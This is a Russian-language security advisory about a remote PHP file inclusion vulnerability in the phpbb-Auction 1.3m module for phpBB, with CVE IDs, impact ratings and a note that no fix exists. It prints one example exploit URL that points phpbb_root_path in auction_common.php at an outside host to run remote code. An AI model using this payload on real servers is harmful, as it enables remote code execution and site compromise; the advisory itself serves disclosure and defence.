PHP-инклюдинг в phpBB phpbb-Auction

Дата публикации:
04.05.2006
Дата изменения:
17.10.2006
Всего просмотров:
4280
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-2245
CVE-2006-7090
CVE-2006-7100
CVE-2006-7147
Вектор эксплуатации:
Удаленная
Воздействие:
Неавторизованное изменение данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
phpbb-Auction 1.x (модуль к phpBB)
Уязвимые версии: phpbb-Auction (модуль для phpBB) 1.3m, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценарии "auction/auction_common.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://[target]/[path]/aution\auction_common.php?
phpbb_root_path=http://unsecured-systems.com/forum/

URL производителя: www.phpbb-auction.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: phpBB auction mod - Remote File Inclusion Vuln

или введите имя

CAPTCHA